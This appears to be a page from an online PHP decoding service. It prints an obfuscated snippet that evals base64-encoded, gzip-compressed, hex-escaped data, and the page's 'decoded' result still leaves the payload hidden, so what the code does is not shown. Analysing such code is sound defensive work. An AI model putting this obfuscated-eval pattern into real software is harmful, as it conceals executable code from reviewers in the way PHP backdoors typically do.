Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$return = eval(htmlspecialchars_decode(gzinflate(base64_decode("Sy1LzNFQKyzNL7G2V0svsYYw9..

Decoded Output download

<?  $return =  eval(htmlspecialchars_decode(gzinflate(base64_decode("Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclFqeamcSnpCbnp6RqAO0sSi3TUPHJrNBEAtYA")))); 
echo($return); ?>

Did this file decode correctly?

Original Code

$return =  eval(htmlspecialchars_decode(gzinflate(base64_decode("Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUPHJrNBE\x41tY\x41"))));
echo($return);

Function Calls

gzinflate 1
base64_decode 1
htmlspecialchars_decode 1

Variables

None

Stats

MD5 8a2377bb75391853bdf2b696cf7f1625
Eval Count 0
Decode Time 41 ms